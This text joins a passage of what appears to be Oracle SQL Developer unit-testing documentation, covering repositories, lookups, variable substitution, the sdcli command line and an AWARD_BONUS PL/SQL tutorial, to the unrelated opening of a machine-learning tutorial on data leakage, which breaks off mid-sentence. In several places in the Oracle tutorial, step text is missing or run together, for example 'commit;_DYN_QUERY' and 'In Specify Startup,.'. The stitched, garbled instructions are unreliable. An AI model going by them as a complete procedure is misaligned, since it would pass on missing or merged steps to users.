"Figure 4-1 Unit Test Navigator" In the preceding figure, the top-level repository node shows the name of the connection being used (unit_test_repos) and whether the user associated with that connection has only User access to the repository or both Administrator and User access (here, both). The preceding figure also shows the types of actions under the Library node (Startups, Teardowns, Validations), one test suite, and several tests. 4.2.1 Unit Test Submenu To display the Unit Test submenu, click Tools, then Unit Test. (The commands on the Unit Test submenu affect the unit test repository.) Select Current Repository: Enables you to select the database connection to use for the unit testing repository, and to create a repository using that connection if no repository exists in the associated schema. Deselect Current Repository: Disconnects from the current unit testing repository. To connect again to a unit testing repository (the same one or a different one), use Select Current Repository. Purge Run Results: Deletes any existing results from the running of tests and suites. Create/Update Repository: Enables you to create a unit resting repository, to hold schema objects associated with the SQL Developer unit testing feature. Drop Repository: Drops (deletes) the current unit testing repository. Purge Repository Objects: Deletes the contents of the current unit testing repository, but does not delete the repository metadata. Import From File: Manage Users: Enables you to select, add, and modify database connections to be used for the unit testing repository. Show Shared Repository: Select As Shared Repository: Makes the current repository a shared repository. Deselect As Shared Repository: Makes the current repository an unshared repository. Related Topics 4.2.2 Other Menus: Unit Test Items The View menu has the following item related to unit testing: Unit Test: Toggles the display of the Unit Test navigator. 4.2.3 Unit Test Preferences The SQL Developer user preferences window (displayed by clicking Tools, then Preferences) contains a Unit Test Parameters pane. Related Topics 4.3 Unit Test Repository The unit test repository is a set of tables, views, indexes, and other schema objects that SQL Developer maintains to manage the use of the unit testing feature. (Most of these objects have UT_ in their names.) You can create a separate database user for a repository or use the schema of an existing database user; but for simplicity and convenience in an environment with a single main shared repository, you may want to create a separate database user. A repository can be unshared or shared, depending on how many and which database users are allowed to perform various types of unit testing operations: In an unshared repository, only the database user that owns the unit test repository schema objects can be used for operations than can modify the repository. There can be multiple unshared repositories, for example, to allow individual developers to create private repositories. In a shared repository, the owner of the repository objects and any other user that has been granted Administrator access to the repository (specifically, UT_REPO_ADMINISTRATOR role) can perform administrative operations, such as managing users. There can be at most one shared repository, and this is the typical case for a team development environment. A repository administrator can add users and can switch the repository status between shared and unshared. (When a repository is made shared, SQL Developer creates public synonyms for the appropriate repository objects.) To change an unshared repository to shared, click Tools, then Unit Test, then Repository, then Select As Shared Repository. To change a shared repository to unshared, click Tools, then Unit Test, then Repository, then Deselect As Shared Repository. 4.3.1 Managing Repository Users and Administrators To create and run unit tests and suites, you must use a connection for a database user that has been granted User access to the repository (specifically, UT_REPO_USER role). To perform repository administrative operations, such as managing users, you must use a connection for a database user that has been granted Administrator access to the repository (specifically, UT_REPO_ADMINISTRATOR role). For example, you may want to allow users SCOTT, JONES, and SMITH to use the unit test capabilities and thus have User access to the shared repository, but to allow only SYS and the user that owns the repository objects to have Administrator access to the shared repository. To grant either type of access to any database users, click Tools, then Unit Test, then Repository, then Manage Users. Select the database connection for the owner of the repository objects or for any other user that has been granted Administrator access to the repository. The Unit Testing: Manage Users dialog box is displayed. Related Topics 4.4 Editing and Running a Unit Test To edit or run a unit test, click the unit test name in the Unit Test navigator and select the desired connection for running the unit test. A pane is displayed with two tabs: Details for the unit test specification, and Results for results if you run or debug the test. The toolbar under the Details tab for the subprogram name has a toolbar that includes the icons shown in the following figure. Freeze View (the pin) keeps that pane in the SQL Developer window when you click another unit test in the Unit Test navigator; a separate tab and detail view pane are created for that other unit test. If you click the pin again, the unit test's detail view pane is available for reuse. Refresh refreshes the display in the pane. Debug starts execution of the first or next implementation of the unit test in debug mode, and displays the results in the Results tab. Run starts normal execution of the unit test, and displays the results in the Results tab. (Before you click Run, you can specify the database user for the run operation by selecting a database connection on the right.) Edit (pencil icon) enables you to edit the unit test specification. (If you cannot modify the unit test, lick the Edit icon.) Commit Changes saves any changes that you have made to the unit test. Rollback Changes discards any unsaved changes that you have made to the unit test. If you click the Edit icon, you can modify the Startup Process, Teardown Process, and details for each implementation. You can also specify Gather Code Coverage Statistics to have SQL Developer collect statistics related to code coverage. To view any statistics that have been gathered from unit test runs, use the Test Runs Code Coverage report. In that report, you can click a row with summary information to display detailed information in the Code Coverage Details pane. 4.5 Using a Dynamic Value Query to Create a Unit Test As an alternative to specifying exact input data when creating a unit test, you can create a dynamic value query to use data from a table as input for the test. The query returns values from specified columns in one or more rows, and all sets of values returned are checked by any process validation that you have specified for the test. One common use of dynamic value queries is to perform "reasonableness" tests, such as checking that each salary or price resulting from a test is within a specified range. To create a test that uses dynamic value queries, create and populate the table to be used by the query, create the test by specifying the object to be tested and any startup and teardown actions, and specify a validation action (such as a query returning rows or no rows). Note: A dynamic value query is executed before the execution of all implementations in a test, including any startup action for the test. If you must populate a table before a dynamic value query is evaluated, you can do this is the startup action for a suite that includes the test. The following example assumes that you have done at least the following in Example of Unit Testing (Tutorial): created the EMPLOYEES table, created the AWARD_BONUS procedure, and created the unit test repository. It creates a unit test that checks to be sure that no salesperson would receive a bonus so large that his or her salary amount would be greater than 20000. Follow these steps: Create and populate the table for the data by executing the following statements: CREATE TABLE award_bonus_dyn_query (emp_id NUMBER PRIMARY KEY, sales_amt NUMBER); INSERT INTO award_bonus_dyn_query VALUES (1001, 5000); INSERT INTO award_bonus_dyn_query VALUES (1002, 6000); INSERT INTO award_bonus_dyn_query VALUES (1003, 2000); commit;_DYN_QUERY (same as the name of the table that you created), and select Create with single dummy representation. In Specify Startup,. In Specify Parameters, click Next to go to the next page. (For this example, do not specify the Dynamic Value Query here; instead, you will specify it in later steps.) In Specify Validations, click Next to go to the next page.. In the Unit Test navigator, click the node for AWARD_BONUS_DYN_QUERY under Tests, to display the test in an editing window. In the Details pane, click the pencil icon next to Dynamic Value Query, enter the following, and click OK: SELECT emp_id, sales_amt FROM award_bonus_dyn_query; For Expected Result, leave the value as Success. In Specify Validations, click the plus (+) icon and select Query returning no rows. For the query, replace the SELECT statement in the Process Validation box with the following (any semicolon at the end of the statement is ignored): SELECT * FROM employees WHERE salary_amt > 20000 AND commission_pct IS NOT NULL That is, for all salespersons (employees whose commission percentage is not null), check whether the salary resulting from the unit test run is greater than 20000. If there are no such salespersons (that is, if the query returns no rows), the result of the validation action is success. Run the AWARD_BONUS_DYN_QUERY unit test. 4.6 Using Lookups to Simplify Unit Test Creation A lookup is an object that contains, for one or more data types, data values that can be tested. Lookups are mainly used for the following purposes: Providing lists of values (dropdown lists) for Input fields. Automatically creating test implementations based on lookup values. To create a lookup: In the Unit Test navigator, right-click the Lookups node and select Add Category. Specify the category name (for example, EMP_ID_LOOKUP). For each data type for which you want to specify lookup values (that is, valid and invalid data values for possible testing), right-click the category name and select Add Datatype, select the data type, and use the + (plus sign) icon to add as many data values as you want. Note that (null)is automatically included in the list of values for each data type for each lookup that you create. For example, for the environment described in Example of Unit Testing (Tutorial), you could create lookups named EMP_ID_LOOKUP and SALES_AMT_LOOKUP. Each would have only one data type: NUMBER. For the NUMBER data for each lookup, use the + (plus sign) icon to add each of the following values on a separate line, and click the Commit Changes icon or press F11 when you are finished entering the set of numbers for each lookup: For EMP_ID_LOOKUP: -100, 99, 1001, 1002, 1003, 1004, 2000, 9999 For SALES_AMT_LOOKUP: -1000, 0, 1000, 2000, 5000, 6000, 10000, 99999 You can delete and rename lookup categories by using the context (right-click) menu in the Unit Test navigator. You can also delete a data type under a lookup category; however, "deleting" in this case removes any currently specified data values for that type for the lookup category, and it makes the type available for selection in the Unit Testing: Add Data Type dialog box. 4.6.1 Providing Values for Input Fields When you are specifying Input parameters for a unit test implementation, you can click the Lookup Category control to select a lookup category. When you then click in a cell under Input, you can click the dropdown arrow to select a value from the specified lookup. (You can also enter a value other than one in the list.) For example, if you created the EMP_ID_LOOKUP lookup category, and if you select it as the lookup category when specifying parameters, then the values -100, 99, 1001, 1002, 1003, 1004, 2000, 9999, and (null) will be in the dropdown list for the Input cell for the EMP_ID parameter. (For the SALES_AMT parameter, use the SALES_AMT_LOOKUP category.) Related Topics 4.6.2 Automatically Creating Implementations If you know that you want implementations to test certain values for a data type, you can use a lookup category to generate these implementations automatically instead of creating them all manually. To do this, use either the DEFAULT lookup category or a user-created category, specify the values for the desired data type, then specify that lookup category for the Configuration set to use for lookups preference in the Unit Test Parameters preferences. For example, assume that for NUMBER input parameters, you always want to check for a very high positive number (such as 9999), a very low negative number (such as -9999), 1, -1, and 0 (zero). Follow these steps: In the Unit Test navigator, expand the Lookups node. Right-click DEFAULT and select Add Datatype. In the dialog box, specify NUMBER. In the Lookups Editor for the NUMBER type, use the + (plus sign) icon to add each of the following as a separate item (new line). 9999 1.0 0 -1.0 -9999 Click the Commit Changes icon or press F11. Click Tools, then Preferences, then Unit Test Parameters, and ensure that the configuration set to use for lookups is DEFAULT (the lookup category for which you just specified the values for the NUMBER data type). Create the unit test in the usual way: in the Unit Test navigator, right-click the Tests node and select Create Test. However, in the Specify Test Name step, select Seed/Create implementations using lookup values (that is, not "Create with single dummy representation"). For Specify Startup and Specify Teardown, specify any desired action. You cannot specify anything for Specify Parameters or Specify Validations now. An implementation (with a name in the form Test Implementation n) will automatically be created for each possible combination of input parameters of type NUMBER. For any validation actions, you must specify them later by editing each generated implementation. 4.7 Using Variable Substitution in Validation Actions You can use variable substitution in validation actions to write dynamic validations that provide a result based on the values of input and output parameters of a procedure or function, or on the return value of a function. You can specify strings in the following format in validation actions: For input parameters: {PARAMETER_NAME } For example, if an input parameter is named EMP_ID: SELECT ... WHERE employee_id = {EMP_ID} AND ...; For output parameters: {PARAMETER_NAME $} For example, if an output parameter is named SALARY: SELECT ... WHERE {SALARY$} < old_salary; For the return value: {RETURNS$} For example, if a function returns a numeric value: SELECT ... WHERE {RETURNS$} > 1; What is actually substituted is the string representation of the parameter value (for text substitution), or the underlying data value of the parameter (for bind substitution, using the syntax : param-name). The following example shows both styles of substitution (text style and bind style): DECLARE l_PARAM1 DATE; bad_date EXCEPTION; BEGIN l_PARAM1 := :PARAM1; IF '{PARAM1}' <> TO_CHAR(l_PARAM1) THEN RAISE bad_date; END IF; END; As a simple example of text-style variable substitution: If P1 is a parameter of type NUMBER and has the value 2.1, the string {P1}will be replaced by the string 2.1. If P1 is a parameter of type VARCHAR2 and has the value ABC, the string '{P1}'will be replaced by the string 'ABC'. (Note the single-quotation marks around {P1} in this example.) You can use variable substitution for all types of validation actions except Compare Tables. For the applicable validation action types, variable substitution is performed as follows: For Query Returning Row(s) and Query Returning No Row(s), substitution is performed on the SQL query. For Compare Query Results, substitution is performed on both the source and target SQL queries. For Boolean Function and User PL/SQL Code, substitution is performed on the PL/SQL block. 4.8 Unit Test Library The unit testing library enables you to store actions that you can reuse in the definitions of multiple unit tests. These user-defined actions are displayed under the Library node in the Unit Test navigator. You can store the following kinds of actions in the library, in the following categories: Dynamic value queries Startup actions Teardown actions Validation actions Most categories have subcategories. For example, the Startup Actions node has subnodes for Table or Row Copy and User PL/SQL Code. You can add an entry to the library in the following ways: Expand the Library hierarchy to display the relevant lowest-level node (such as User PL/SQL Code under Startups); right-click and select Add [action-type]; specify a name for the action; click the name of the newly created action; and complete the specification. Use the Publish to Library option when specifying the action when you are creating a unit test: enter a name for the action and click Publish. (The action will be added under the appropriate category and subcategory in the Library display in the Unit Test navigator.) To use an action from the library when you are creating a unit test, select it from the list under Library on the appropriate page in the Unit Testing: Create Unit Test wizard or when you are editing a unit test. When you select an action from the library, you have the following options for incorporating it into the process (startup, teardown, or validation): Copy: Uses a copy of the action, which you can then edit (for example, to modify the WHERE clause in a User PL/SQL Code procedure). If the action is later changed in the library, it is not automatically re-copied into the process. Subscribe: Uses the action as stored in the library. (You cannot edit the action in the process if you use the Subscribe option.) If the action is later changed in the library, the changed version is automatically used in the process. 4.9 Unit Test Reports Several SQL Developer reports provide information about operations related to unit testing. These reports are listed in the Unit Test navigator under the Reports node. The available reports include: All Suite Runs All Test Implementation Runs All Test Runs Suite Runs Code Coverage Suite Test Implementation Runs Suite Test Runs Test Implementation Runs Test Runs Code Coverage User Test Runs (test runs grouped by user) Each unit testing report contains a top pane with a summary information row for each item. To see detailed information about any item, click in its row to display the information in one or more detail panes below the summary information. For example, if you click in a summary row in the All Test Runs report, details about that test run are displayed under the Test Run Details and Most Recent Code Coverage tabs. Some reports prompt you for bind variables, where you can accept the default values to display all relevant items or enter bind variables to restrict the display. Related Topics 4.10 Exporting and Importing Unit Test Objects You can export and import unit tests, suites, and objects that are stored in the library (such as startup, validation, and teardown actions). Exporting an object causes all dependent objects to be included in the resulting XML file. For example, if you export a suite, the resulting XML file includes all tests in that suite, as well as all startup, validation, and teardown actions within each test in that suite. To export an object, right-click its name in the Unit Test navigator and select Export to File; then specify the location and name for the XML file that will include the definitions of the objects. Importing unit test objects from an XML file causes all objects in the file to be created in the appropriate places in the Unit Test navigator hierarchy. If an object already exists in the repository with the same name as an object of the same type in the XML file, it is replaced (overwritten) by the object definition in the XML file. To import unit test objects, click Tools, then Unit Test, then Import from File; then specify the XML file to be used for the import operation. 4.11 Command-Line Interface for Unit Testing As an alternative to using the SQL Developer graphical interface for to running unit tests and suites, and exporting and importing unit test objects, you can use the command line. When running a unit test from the command-line interface, you can use the following parameters: -db <connection name>specifies the database connection associated with the database user to be used for running the unit test. -repo <connection name>specifies the database connection associated with the unit testing repository to be used for running the unit test. {-log <0,1,2,3>}specifies the logging level, where: 0 = No logging (the default). 1 = Report the status. 2 = Report the status and error message. 3 = Report the status, error message, and return ID value. {-return <return id>}specifies the return ID value, which is used as the primary key in the results table, and which will allow automation tools to query the results from the database. The following example runs a unit test named AWARD_BONUS in a Windows environment where SQL Developer is installed under C:\. (Note that test and suite names are case sensitive for the command-line interface.) This example uses the repository connection for user unit_test_repos and runs the test as user fred. > cd c:\sqldeveloper\sqldeveloper\bin > sdcli unittest -run -test -name AWARD_BONUS -repo unit_test_repos -db fred The following example exports a unit test named AWARD_BONUS. It uses the repository connection for user unit_test_repos and stores the exported definitions in the file C:\ut_xml\award_bonus_test.xml. > sdcli unittest -exp -test -name AWARD_BONUS -repo unit_test_repos -file c:\ut_xml\award_bonus_test.xml The following example imports object definitions from the file C:\ut_xml\award_bonus_suite.xml. It uses the repository connection for user unit_test_repos. > sdcli unittest -imp -repo unit_test_repos -file c:\ut_xml\award_bonus_suite.xml To check the results of any tests or suites that you run from the command line, you can start SQL Developer and view the All Test Runs and All Suite Runs reports. 4.12 Unit Testing Best Practices This topic contains some recommendations and suggestions for using unit testing in SQL Developer: 4.12.1 Strategy If you have many packages, analyze the system as a whole to group the packages into functional areas, and create a test suite for each functional area. This process of decomposition can be done recursively, where the ideal situation is come up with small groups of testable objects that have a common set of argument values. With a test suite hierarchy in place, you can create tests for each object and place the tests into the hierarchy. 4.12.2 Test Suites Tests should be organized into test suites to facilitate the bulk execution of tests. Suites can be built from other suites and tests, allowing areas of interest to be grouped together, and even a "super suite" can be created that executes all tests. 4.12.3 Test Naming Test names are limited to 120 bytes, so test names can be up to 120 characters for a single-byte character set (significantly smaller for multibyte character sets). Tests are automatically created using the canonical name of the test object (that is, package functions and procedures will be qualified by the package name). For example, given standalone functions or procedures named MY_PROCEDURE_NAME and MY_FUNCTION_NAME and a package named MY_PACKAGE_NAME, the test names will be MY_PACKAGE_NAME.MY_PROCEDURE_NAME and MY_PACKAGE_NAME.MY_FUNCTION_NAME. 4.12.4 Avoiding Test Naming Clashes If you try to create a test with the same name as an existing test (for example, creating a test multiple times on the same object or on an object with the same name in a different schema), then a sequential number is appended to the new test name. This might result, for example, in the following tests: MY_PACKAGE_NAME.MY_PROCEDURE_NAME MY_PACKAGE_NAME.MY_PROCEDURE_NAME_1 MY_PACKAGE_NAME.MY_PROCEDURE_NAME_2 However, you may want to consider these alternatives: If you have objects with the same name in different schemas, it is recommended that you prefix (prepend) the test name with either the physical schema name or a logical synonym. For example, in the following full test names, the last part is the same but the names start with different schema names: USER3.MY_PACKAGE_NAME.MY_PROCEDURE_NAME USER4.MY_PACKAGE_NAME.MY_PROCEDURE_NAME USER5.MY_PACKAGE_NAME.MY_PROCEDURE_NAME If there is a valid reason to add a test for the same object more than once, then it may be better to give each test a distinct name it rather than use the default "sequence" approach. For example: MY_PACKAGE_NAME.MY_PROCEDURE_NAME#LATEST MY_PACKAGE_NAME.MY_PROCEDURE_NAME#COMPATIBLE 4.12.5 Test Implementations When a test is created, a child Implementation of the test is also created. Each implementation forms the configuration for the execution of a test. The first implementation is named Test Implementation 1. You can create additional Implementations to exercise the object with different combinations of values and environment. It is recommended that you use implementation names that reflect the test strategies. For example, instead of using the names Test Implementation 1, Test Implementation 2, and Test Implementation 3, use names like Upper Boundaries, Lower Boundaries, and Default Values. 4.12.6 Library The library is a repository of commonly used values (but not data values, for which you should use Lookups). If you find you are entering the same values into the unit testing panels (for example, Startup Process), you can place those values in the library and reuse them in multiple places. You can take this a step further and ensure that all values are stored in the library, whether they are reused or not. This brings more order to the test building process, and means that as the tested logic changes, it is easy to update all tests accordingly. 4.12.7 Lookups Lookups store data type value domains organized into categories. For example, a SALES category might have a NUMBER data type with domain values of (-1, 0, 1, 1000, 1000000000). Categories can be created to group data type values at a fine grain (for example, EMPLOYEE or SET_3) or at the most coarse grain (for example, DEFAULT). A test implementation can be associated with only one lookup category, so you can choose a category to cover the values for all the implementations of a single test, in which case it is recommended that the lookup name echo the corresponding test name. 4.12.8 Test and Suite Execution You can execute tests and test suites using the SQL Developer graphical and command-line interfaces. It may be more convenient to use the command-line interface to execute suites or a "super suite" (consisting of all tests). You could create a generator to run against the UT_TEST and UT_SUITE tables found in the repository schema (or public synonyms for a shared repository) to generate the operating system commands necessary to execute tests and suites. 4.13 Example of Unit Testing (Tutorial) This section presents a simplified example in which you create a table and a PL/SQL procedure, create unit tests with test cases for valid and invalid input data, run the unit tests, and create and run a unit test suite. It assumes that you have a table of employee data that includes salary information, and that you need to create a procedure to award bonuses to sales representatives, whose pay consists of a base salary plus a commission-based bonus. The EMPLOYEES table includes the following columns, all of type NUMBER: EMPLOYEE_ID: Employee identification (badge) number. COMMISSION_PCT: Commission percentage for the employee: a decimal fraction representing the percentage of the amount of sales by the employee, to be used to compute a bonus that will be added to the employee's base salary to determine the total salary. For example, 0.2 or .2 indicates a 20 percent commission, or 0.2 times the amount of sales. Only employees in the Sales department have numeric COMMISSION_PCT values. Other employees (not "on commission") have null COMMISSION_PCT values. SALARY: Salary amount for the employee; includes base salary plus any bonus (which will be calculated by an award_bonusprocedure, to be created during this example). Assume that the following data exists in these columns in the EMPLOYEES table: You create a procedure named AWARD_BONUS, which has two input parameters: emp_id: The employee ID of an employee. sales_amt: The amount of sales with which the employee is credited for the period in question. This amount is calculated using the COMMISSION_PCT value for the specified employee, and the result is added to the SALARY value for that employee. If the COMMISSION_PCT is null for the employee, no commission or bonus can be calculated, and an exception is raised. This scenario occurs if an attempt is made to add a commission-based bonus to the salary of an employee who is not in the Sales department. The rest of this example involves the following major steps: 4.13.1 Create the EMPLOYEES Table This tutorial uses a table named EMPLOYEES, which must exist before you run any unit tests of the AWARD_BONUS procedure. This table contains some of the columns used in the HR.EMPLOYEES table that is included in the Oracle-supplied sample schemas, but it does not contain all of the columns, and it contains fewer rows and different data. You can create this EMPLOYEES table in an existing schema and using an existing database connection, or you can create a new schema and connection for the table. To create and populate this table, enter the following statements in a SQL Worksheet or a SQL*Plus command window: -- Connect as the database user that will be used to run the unit tests. -- Then, enter the following statements: CREATE TABLE employees (employee_id NUMBER PRIMARY KEY, commission_pct NUMBER, salary NUMBER); INSERT INTO employees VALUES (1001, 0.2, 8400); INSERT INTO employees VALUES (1002, 0.25, 6000); INSERT INTO employees VALUES (1003, 0.3, 5000); -- Next employee is not in the Sales department, thus is not on commission. INSERT INTO employees VALUES (1004, null, 10000); commit; 4.13.2 Create the AWARD_BONUS Procedure Create the AWARD_BONUS procedure in the same schema as the EMPLOYEES table. In a SQL Worksheet using the appropriate database connection, enter the following text: create or replace PROCEDURE award_bonus ( emp_id NUMBER, sales_amt NUMBER) AS commission REAL; comm_missing EXCEPTION; BEGIN SELECT commission_pct INTO commission FROM employees WHERE employee_id = emp_id; IF commission IS NULL THEN RAISE comm_missing; ELSE UPDATE employees SET salary = salary + sales_amt*commission WHERE employee_id = emp_id; END IF; END award_bonus; / Click the Run Script icon (or press F5) to create the AWARD_BONUS procedure. 4.13.3 Create the Unit Testing Repository You will need a unit testing repository in the database to hold schema objects that you create and that SQL Developer will maintain. You can create a separate database user for this repository or use the schema of an existing database user; however, to simplify your learning and any possible debugging you may need to do later, it is recommended that you use a separate schema for the unit testing repository, and the instructions in this section reflect this approach. Create a database user (for example, UNIT_TEST_REPOS) for the unit testing repository. Using a database connection with DBA privileges, right-click Other Users in the Connections navigator and select Create User. Specify UNIT_TEST_REPOS as the user name, and complete any other required information. For Default Tablespace, specify USERS; for Temporary Tablespace, specify TEMP. For System Privileges, enable CREATE SESSION; then click Apply, then Close. Create a database connection for the unit testing repository user that you created, as follows. Click Tools, then Unit Test, then Manage Users. In the Select Connection dialog box, click the plus (+) icon to create a new database connection (for example, unit_test_repos) for the unit testing repository user. Click Save to save the connection, then Cancel to close the dialog box. Create the repository in the schema of the user that you created, as follows. Click Tools, then Unit Test, then Select Current Repository. Specify the database connection (for example, unit_test_repos) for the unit testing repository user. When you see a message that no repository exists for that connection, follow the prompts to create a new repository. SQL Developer will display several prompts so it can execute commands that grant the necessary privileges to the unit test repository user. In each case, click Yes, and enter the SYS account password when prompted. 4.13.4 Create a Unit Test To create the first unit test, use the Unit Test navigator. If this navigator is not visible on the left side, click View, then Unit Test. In the Unit Test navigator, right-click the Tests node and select Create Test. The Unit Testing: Create Unit Test wizard is displayed. In the remaining steps, (same as the procedure name), and select Create with single dummy representation. In Specify Startup, click the plus (+) icon to add a startup action; and for the action. (The target table will be created; and if a table already exists with the name that you specify as the target table, it will be overwritten.) In Specify Parameters, change the values in the Input column to the following: For Parameter EMP_ID: 1001 For Parameter SALES_AMT: 5000 For Expected Result, leave the value as Success. In Specify Validations, click the plus (+) icon and select Query returning row(s). For the query, replace the SELECT statement in the Process Validation box with the following (any semicolon at the end of the statement is ignored): SELECT * FROM employees WHERE employee_id = 1001 AND salary = 9400 That is, because employee 1001 has a 20 percent (0.2) commission and because the sales amount was specified as 5000, the bonus is 1000 (5000 * 0.2), and the new salary for this employee is 9400 (8400 base salary plus 1000 bonus). In this case, the query returns one row, and therefore the result of the validation action is success. Note that you could have instead specified the SELECT statement in this step using variable replacement, as follows: SELECT * FROM employees WHERE employee_id = {EMP_ID} AND salary = 9400 However, in this specific example scenario, using variable substitution would provide no significant advantage.. 4.13.5 Run the Unit Test To run the unit test, use the Unit Test navigator. If this navigator is not visible on the left side, click View, then Unit Test. In the Unit Test navigator, expand the Tests node and click the AWARD_BONUS test. A pane for the AWARD_BONUS test is displayed, with Details and Results tabs. On the Details tab, near the top-right corner, select the database connection for the schema that you used to create the AWARD_BONUS procedure. Do not change any other values. (However, if you later want to run the unit test with different specifications or data values, you can click the Edit (pencil) icon in the Code Editor toolbar at the top of the pane.) Click the Run Test (green arrowhead) icon in the Code Editor toolbar (or press F9). At this point, focus is shifted to the Results tab, where you can soon see that the AWARD_BONUS ran successfully. If you want to check the EMPLOYEES table data, you will see that the salary for employee 1001 is the same as it was before (8400), because the startup action for the unit test copied the original data to the temporary table and the teardown action restored the original data to the EMPLOYEES table. Related Topics 4.13.6 Create and Run an Exception Unit Test Create another unit test for the exception condition where the COMMISSSION_PCT value is null for the employee, and therefore no commission or bonus can be calculated. For this tutorial, the test data includes employee 1004 with a null commission percentage. (This condition could result from several possible scenarios, the most likely being an attempt to run the procedure on a salaried employee who is not eligible for commissions.) The steps for creating this exception unit test are similar to those in Create a Unit Test, except there are no startup or teardown steps because this test should not modify any table data, and there is no need for any validation action._NO_COMM_EXC, and select Create with single dummy representation. In Specify Startup, click Next to go to the next page. In Specify Parameters, change the values in the Input column to the following: EMP_ID: 1004 SALES_AMT: 5000 For Expected Result, change the value to Exceptionand leave the expected error number as ANY. In Specify Validations, click Next to go to the next page. In Specify Teardown, click Next to go to the next page. In Summary, review the information. If you need to change anything, click Back as needed and make the changes, then proceed to this Summary page. When you are ready to complete the unit test definition, click Finish. To run this unit test, follow the steps in Run the Unit Test, except specify AWARD_BONUS_NO_COMM_EXC instead of AWARD_BONUS. On the Results tab, you will see that the AWARD_BONUS_NO_COMM_EXC test ran successfully; and if you check the EMPLOYEES table data, you will see that the information for employee 1004 (and all the other employees) was not changed. Note: As an alternative to creating a separate unit test for the exception condition, you could add it as an implementation to the AWARD_BONUS test (right-click AWARD_BONUS and select Add Implementation). Thus, the AWARD_BONUS unit test would have two implementations: the "Default" implementation using employee 1001, and the AWARD_BONUS_NO_COMM_EXC implementation using employee 1004. The approach in this tutorial enables you to create a simple unit test suite using the two unit tests. However, in more realistic unit testing scenarios, it is probably better to use a unit test for each procedure, add implementations for each test case for a procedure, and group multiple unit tests (for individual procedures) into one or more test suites. Related Topics 4.13.7 Create a Unit Test Suite Create a unit test suite that groups together the two unit tests of the AWARD_BONUS procedure. If the Unit Test navigator is not visible on the left side, click View, then Unit Test. In the Unit Test navigator, right-click the Suites node and select Add Suite. In the Unit Testing: Add Test Suite dialog box, specify AWARD_BONUS_SUITEas the suite name. In the Unit Test navigator, under Suites, click the AWARD_BONUS_SUITE node. An pane for the AWARD_BONUS_SUITE test suite is displayed. Do not specify a Startup Process or Teardown Process, because neither is needed for this test suite. Click the Add (+) icon to add the first test to the suite. In the Unit Testing: Add Tests or Suites to a Suite dialog box, click (select) AWARD_BONUS, check (select) Run Test Startups and Run Test Teardowns so that the startup and teardown actions for that unit test will be run, and click OK. Click the Add (+) icon to add the next test to the suite. In the Unit Testing: Add Tests or Suites to a Suite dialog box, click (select) AWARD_BONUS_NO_COMM_EXC, and click OK. (The check Run Test Startups and Run Test Teardowns options are irrelevant here because the AWARD_BONUS_NO_COMM_EXC test does not perform any startup and teardown actions.) Click the Commit Changes icon in the Code Editor toolbar at the top of the pane (or press F11). 4.13.8 Run the Unit Test Suite To run the unit test suite, use the Unit Test navigator. If you are in the editing pane for the AWARD_BONUS_SUITE test suite, run the suite by clicking the Run Suite (green arrowhead) icon in the Code Editor toolbar. Otherwise, perform the following steps: In the Unit Test navigator, expand the Suites node and click the AWARD_BONUS_SUITE test suite. A pane for the AWARD_BONUS_SUITE test is displayed, with Details and Results tabs. In the Details tab, near the top-right corner, select the database connection for the schema that you used to create the AWARD_BONUS procedure. Do not change any other values. (However, if you later want to run the unit test suite with different specifications, you can click the Edit (pencil) icon in the Code Editor toolbar at the top of the pane.) Click the Run Suite (green arrowhead) icon in the Code Editor toolbar (or press F9). After the suite is run, focus is shifted to the Results tab, where you can soon see that the AWARD_BONUS_SUITE test suite ran successfully.
https://docs.oracle.com/en/database/oracle/sql-developer/18.3/rptug/sql-developer-unit-testing.html
CC-MAIN-2020-34
refinedweb
7,445
50.16
Last Updated on August 17, 2020 Data preparation is the process of transforming raw data into a form that is appropriate for modeling. A naive approach to preparing data applies the transform on the entire dataset before evaluating the performance of the model. This results in a problem referred to as data leakage, where knowledge of the hold-out test set leaks into the dataset used to train the model. This can result in an incorrect estimate of model performance when making predictions on new data. A careful application of data preparation techniques is required in order to avoid data leakage, and this varies depending on the model evaluation scheme used, such as train-test splits or k-fold cross-validation. In this tutorial, you will discover how to avoid data leakage during data preparation when evaluating machine learning models. After completing this tutorial, you will know: -. Kick-start your project with my new book Data Preparation for Machine Learning, including step-by-step tutorials and the Python source code files for all examples. Let’s get started. Tutorial Overview This tutorial is divided into three parts; they are: - Problem With Naive Data Preparation - Data Preparation With Train and Test Sets - Train-Test Evaluation With Naive Data Preparation - Train-Test Evaluation With Correct Data Preparation - Data Preparation With k-fold Cross-Validation - Cross-Validation Evaluation With Naive Data Preparation - Cross-Validation Evaluation With Correct Data Preparation Problem With Naive Data Preparation The manner in which data preparation techniques are applied to data matters. A common approach is to first apply one or more transforms to the entire dataset. Then the dataset is split into train and test sets or k-fold cross-validation is used to fit and evaluate a machine learning model. - 1. Prepare Dataset - 2. Split Data - 3. Evaluate Models Although this is a common approach, it is dangerously incorrect in most cases. The problem with applying data preparation techniques before splitting data for model evaluation is that it can lead to data leakage and, in turn, will likely result in an incorrect estimate of a model’s performance on the problem. Data leakage refers to a problem where information about the holdout dataset, such as a test or validation dataset, is made available to the model in the training dataset. This leakage is often small and subtle but can have a marked effect on performance. … leakage means that information is revealed to the model that gives it an unrealistic advantage to make better predictions. This could happen when test data is leaked into the training set, or when data from the future is leaked to the past. Any time that a model is given information that it shouldn’t have access to when it is making predictions in real time in production, there is leakage. — Page 93, Feature Engineering for Machine Learning, 2018. We get data leakage by applying data preparation techniques to the entire dataset. This is not a direct type of data leakage, where we would train the model on the test dataset. Instead, it is an indirect type of data leakage, where some knowledge about the test dataset, captured in summary statistics is available to the model during training. This can make it a harder type of data leakage to spot, especially for beginners. One other aspect of resampling is related to the concept of information leakage which is where the test set data are used (directly or indirectly) during the training process. This can lead to overly optimistic results that do not replicate on future data points and can occur in subtle ways. — Page 55, Feature Engineering and Selection, 2019. For example, consider the case where we want to normalize a data, that is scale input variables to the range 0-1. When we normalize the input variables, this requires that we first calculate the minimum and maximum values for each variable before using these values to scale the variables. The dataset is then split into train and test datasets, but the examples in the training dataset know something about the data in the test dataset; they have been scaled by the global minimum and maximum values, so they know more about the global distribution of the variable then they should. We get the same type of leakage with almost all data preparation techniques; for example, standardization estimates the mean and standard deviation values from the domain in order to scale the variables; even models that impute missing values using a model or summary statistics will draw on the full dataset to fill in values in the training dataset. The solution is straightforward. Data preparation must be fit on the training dataset only. That is, any coefficients or models prepared for the data preparation process must only use rows of data in the training dataset. Once fit, the data preparation algorithms or models can then be applied to the training dataset, and to the test dataset. - 1. Split Data. - 2. Fit Data Preparation on Training Dataset. - 3. Apply Data Preparation to Train and Test Datasets. - 4. Evaluate Models. More generally, the entire 